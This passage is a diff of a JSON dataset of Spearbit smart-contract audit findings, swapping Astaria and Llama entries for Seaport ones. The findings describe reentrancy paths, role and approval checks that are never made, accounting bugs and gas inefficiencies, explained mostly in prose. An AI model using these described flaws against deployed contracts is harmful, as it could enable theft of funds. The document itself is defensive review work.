One might be able to extract _contractNonces[offerer] (if it doesn't overflow 12 bytes and enter into the offerer region of the orderHash) from a later event when OrderFulfilled gets emitted. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...) return data satisfies all the constraints.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Inheriting the same contract twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in the Vault and PublicVault contracts, as they both inherit VaultImplementation already.", + "title": "In general a contract offerer or a zone cannot draw a conclusion accurately based on the spent offer amounts or received consideration amounts shared with them post-transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items will go through different modification steps in memory. In particular, the startAmount a of these items is an important parameter to inspect: a → a′ → b → a′ a : the original startAmount parameter shared with Seaport by the caller, as encoded in memory. a′ : the interpolated value; for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation does not have an effect in this case, since startAmount and endAmount are enforced to be equal). b : must be 0 for used consideration items, otherwise the call would revert. For offer items, it can be in [0, a′) (see \"The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general\"). a′ : the final amount shared by Seaport with either a zone for restricted orders or a contract offerer for CONTRACT order types. Offer Items For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maximum of a′ of that specific offer item. For the case of restricted orders, where the zone's validateOrder(...) will be called, the offerer might end up spending more than a′ of a specific token with the same identifier if the collection of orders includes: A mix of open and restricted orders. Multiple zones for the same offerer, offering the same token with the same identifier. Multiple orders using the same zone. In this case, the zone might not have a sense of the order of the transfers or which orders are included in the transaction in question (unless the contexts used by the zone enforce the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note that the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given a fulfillment data to combine/aggregate orders, there could be permutations of it that create different orderings of the executions. An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. And when Seaport calls into this actor
(NATIVE, ERC1155 token transfers, ...), the actor would transfer the token to a different address than the offerer. There is also a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, contract offerer, weird token, ...) can cross-call into (related: \"Cross-Seaport re-entrancy with the stateful validateOrder call\"). The above issue can be avoided if the offerer makes sure not to sign different transactions, across different or the same instances of Seaport, which: 1. share the same offer type, offer token, and offer identifier, 2. differ in a mix of zone and order type, and 3. can be active at a shared timestamp. And/or the offerer does not give untrusted parties their token approvals. A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types. Consideration Items For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a′ of that specific consideration item. This case is also similar to the offer item issues above when a mix of orders has been used.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "No need to re-cast variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Code above highlights redundant type castings. ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These type castings are casting variables to the same type.", + "title": "Cross-Seaport re-entrancy with the stateful validateOrder call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario would happen if the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross-Seaport re-entrancy. This is not immediately problematic, as Zones have limited functionality currently. But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport. Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it's also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3. Note: also see \"getOrderStatus and getContractOffererNonce are prone to view reentrancy\" for concerns around view-only re-entrancy.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Comments do not match implementation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " Scenario 1 & 2: Comments note where each parameter ends in a packed byte array, or parameter width in bytes. The comments are outdated.
Scenario 3: The unless is not implemented.", + "title": "getOrderStatus and getContractOffererNonce are prone to view reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When a mix of contract offerer orders and partial orders is used, Seaport would call into the offerer contracts (let's call one of these offerer contracts X). In turn, X can be a contract that would call into other contracts (let's call them Y) that take _orderStatus[orderHash] or _contractNonces[offerer] into consideration in their codebase by calling getOrderStatus or getContractOffererNonce. The values of _orderStatus[orderHash] or _contractNonces[offerer] might get updated after Y seeks those from Seaport, due to, for example, multiple partial orders with the same orderHash or multiple contract offerer orders using the same offerer. Therefore, Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Incomplete Natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " LienToken.sol#L616 s, @return missing LienToken.sol#L738-L750 s, position, @return missing CollateralToken.sol#L616-L628 tokenId_ missing VaultImplementation.sol#L153-L165 The second * on /** is missing, causing the compiler to ignore the Natspec. The Natspec appears to document an old function interface. Params do not match with the function inputs. VaultImplementation.sol#L298-L310 missing stack and return value AstariaRouter.sol#L75-L77 @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL and _- CLEARING_HOUSE_IMPL AstariaRouter.sol#L44-L47 : Leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts.", + "title": "The size calculation can be incorrect for large numbers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The maximum value of a memory offset is defined in PointerLibraries.sol#L22 as OffsetOrLengthMask = 0xffffffff, i.e., 2^32 - 1. However, the mask OnlyFullWordMask = 0xffffe0; is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0; then the following piece of code incorrectly computes the size as 0. function abi_encode_bytes( MemoryPointer src, MemoryPointer dst ) internal view returns (uint256 size) { unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... This is because the constant OnlyFullWordMask does not have the two higher-order bytes set (as a 32-bit type). Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to the upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Low Risk" ] }, { - "title": "Cannot have multiple liens with same parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Lien Ids are computed by hashing the Lien struct itself. This means that no two liens can have the same parameters (e.g.
same amount, rate, duration, etc.).", + "title": "_prepareBasicFulfillmentFromCalldata expands memory more than needed by 4 extra words", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In _prepareBasicFulfillmentFromCalldata, we have: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(0x80, add(eventDataPtr, dataSize))) OrderFulfilled's event data is stored in memory in the region [eventDataPtr, eventDataPtr + dataSize). It's important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the 0x80 (4 words) in the snippet above is extra. For example, in the \"ERC721 <=> ETH (basic, minimal and verified on-chain)\" test case in test/basic.spec.ts, the Seaport memory profile at the end of the call marketplaceContract.connect(buyer).fulfillBasicOrder(basicOrderParameters, {value,}) looks like: 0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id) 0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ... 0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer 0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot 0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash 0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer 0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone 0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho) 0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n]) 0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType 0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime 0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime 0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash 0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller 0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offerer array head 0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head 0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length 0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType 0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token 0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria 0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount 0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1 0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType 0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE) 0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria 0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount
0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer 0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length 0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31] 0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63] 0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns (bool fulfilled) Notice the 4 unused memory slots. Transaction Trace. This is also a good example to see that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten due to the small number of consideration items (this actually happens inside _prepareBasicFulfillmentFromCalldata).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Redundant unchecked can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are no arithmetic operations in these unchecked blocks. For clarity, they can be removed.", + "title": "TypehashDirectory's constructor code can be optimized.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "TypehashDirectory's deployed bytecode in its current form is: 00 3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00 bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01 53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02 a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03 39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04 1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05 ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06 7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07 bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08 d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09 896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10 bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11 e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12 6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13 d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14 1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15 eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16 c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17 0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18 5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19 80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20 3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21 5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22 1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23 (for height 24)", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" +
"Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Argument name reuse with different meaning across contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ken.LienActionEncumber receiver is the lender (the receiver of the LienToken)", + "title": "ConsiderationItem.recipient's absolute memory offset can be cached and reused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ConsiderationItem.recipient's absolute offset is calculated twice in the above context.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Licensing conflict on inherited dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The version of Solmate contracts depended in tne gpl repository on are AGPL Licensed, making the gpl repository adopt the same license. This license is incompatible with the currently UNLICENSED Astaria related contracts.", + "title": "currentAmount can potentially be reused when storing this value in memory in _validateOrdersAnd- PrepareToFulfill", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have considerationItem.startAmount = currentAmount; // 1 ... mload( // 2 add( considerationItem, ReceivedItem_amount_offset ) ) From 1 where considerationItem.startAmount is assigned till 2 its value is not modifed.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The castApprovalBySig and castDisapprovalBySig functions can revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The castApprovalBySig and castDisapprovalBySig functions are used to cast an approve or disapprove via an off-chain signature. Within the _preCastAssertions a check is performed against the strategy using msg.sender instead of policy- holder, the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder. isApproval ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender) : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender); While this works for normal cast, using the ones with signatures will fail as the sender can be anyone who calls the method with the signature signed off-chain.", + "title": "Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Currently the way information is packed and unpacked in/from BasicOrderType is inefficient. Basi- cOrderType is only used for BasicOrderParameters and when unpacking to give an idea how diffferent parameters are packed into this field.", "labels": [ "Spearbit", - "Llama", - "Severity: Critical Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The castApproval/castDisapproval doesn't check if role parameter is the approvalRole", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. 
It should not be possible for other roles to cast an action. The _castApproval method verifies if the policyholder has the role passed as an argument, but doesn't check if it actually has the approvalRole which is eligible to cast an approval. This means any role in the Llama contract can participate in the approval, with completely different quantities (weights). The same problem occurs for the castDisapproval function as well.", + "title": "invalidNativeOfferItemErrorBuffer calculation can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have (func sig): matchOrders = 0b10101000000101110100010 00 0000100, matchAdvancedOrders = 0b01010101100101000100101 00 1000010, fulfillAvailableOrders = 0b11101101100110001010010 10 1110100, fulfillAvailableAdvancedOrders = 0b10000111001000000001101 10 1000001 (the spaced-out pair of bits marks the 9th bit).", "labels": [ "Spearbit", - "Llama", - "Severity: Critical Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuantity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "In Llama, a policyholder can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of an individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method is not handling the decrease of quantity correctly for the totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows: uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - initialQuantity; However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See: LlamaPolicy.sol#L388 // case: willHaveRole=true, hadRoleQuantity=true newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;", + "title": "When accessing or writing to memory the value of an enum for a struct field, the enum's validation is performed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType, ConsiderationItem.itemType, and SpentItem.itemType.", "labels": [ "Spearbit", - "Llama", - "Severity: High Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama has two distinct revokePolicy functions.
The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether a policyholder still holds the role. In the next step, the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an \"out-of-gas\" error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles of a policyholder. The method contains the following check: if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder); Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state. The token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check if the token has been burned. (See LlamaPolicy.sol#L250)", + "title": "The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailableOrders, and matchOrders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When the external functions in this context are called, no criteria is passed to _validateAndFulfillAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory pointer by a word and performs an out-of-range and overflow check for this value: function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) }", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note: // There must be at least one role holder with role ID of 1, since that role ID is initially // given permission to call `setRolePermission`. This is required to reduce the chance that an // instance is deployed with an invalid configuration that results in the instance being unusable. // Role ID 1 is referred to as the bootstrap role. There are still several ways a user can misstep and lose access to LlamaCore. Bootstrap Role Scenarios While the bootstrap role is still needed: 1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed, any caller may remove the BOOTSTRAP_ROLE from expired policyholders. 2. Removing the BOOTSTRAP_ROLE from all policyholders. 3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false).
General Roles and Permissions Similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem. Misconfigured Strategies A misconfigured strategy may also result in the inability to process new actions. For example: 1. Setting minApprovals too high. 2. Setting queuingPeriod unreasonably high. 3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty). 4. Items 1 & 2, but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive). Removal of Strategies It is possible to remove all strategies from a Llama instance; it should not be possible to remove the last strategy of an instance. It would not be possible to create a new action afterward. An action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost. Misconfigured Guards An accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management: if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.", + "title": "matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders return executions which are cleaned and validated by the compiler", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders are cleaned and validated by the compiler.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaPolicy.hasRole doesn't check if a policyholder holds a token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Incorrect usage of the revokePolicy function can result in a case where the token of a policyholder is already burned but the policyholder still holds a role. The hasRole function doesn't check if, in addition to the role, the policyholder still holds the token to be active. The role could still be used in the Llama system.", + "title": "abi.encodePacked is used when only bytes/string concatenation is needed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the context above, one is using abi.encodePacked like the following: bytes memory B = abi.encodePacked( \"\", \"\", ...
\"\" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the least amount of mstores which is the ceiling of the length of substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama utilizes Checkpoints to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders together 50% minimum approval: If a new action is created and two policyholders are added subsequently within the same block.timestamp. 9 The numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows to bundle different actions. If a separate action is used to add a new policyholder, the final execution happens via a public callable function. An attacker could exploit this by trying to execute the add new policyholder action if a new action is created", + "title": "solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaCore delegate calls can bring Llama into an unusable state", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The core contract in Llama allows the execution of actions through a delegate_call. An action is executed as a delegate_call when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegate_call, a script contract could modify arbitrary any slot of the core contract. The Llama team is aware of this fact and has added additional safety-checks to see if the slot0 has been modified by the delegate_call. The slot0 contains values that should never be allowed to change. bytes32 originalStorage = _readSlot0(); (success, result) = actionInfo.target.delegatecall(actionInfo.data); if (originalStorage != _readSlot0()) revert Slot0Changed(); A script might be intended to modify certain storage slots. 
However, incorrect SSTORE operations can completely break the contracts. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost.", + "title": "The use of identity precompile to copy memory need not be optimal across chains", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The PointerLibraries contract uses a staticcall to the identity precompile, i.e., address 4, to copy memory--poor man's memcpy. This is used as a cheaper alternative to copying 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before the Berlin hardfork was 700 (from Tangerine Whistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM-compatible L1s, and even L2s, are on old EVM versions, and there using the identity precompile would be more expensive than doing the mstore(...) copies.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The execution opcode of an action can be changed from call to delegate_call after approval", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "In Llama, an action only defines the target address and the function which should be called. An action doesn't implicitly define if the opcode should be a call or a delegate_call. This only depends on whether the target address is added to the authorizedScripts mapping. However, adding a target to the authorizedScripts can be done after the approval, in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. The change of adding a target to authorizedScript should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption the opcode will be a call instead of a delegate call.", + "title": "Use the zero memory slot for allocating empty data", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In cases where empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaFactory is governed by Llama itself", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama uses their own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, a broken strategy contract would need to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies.
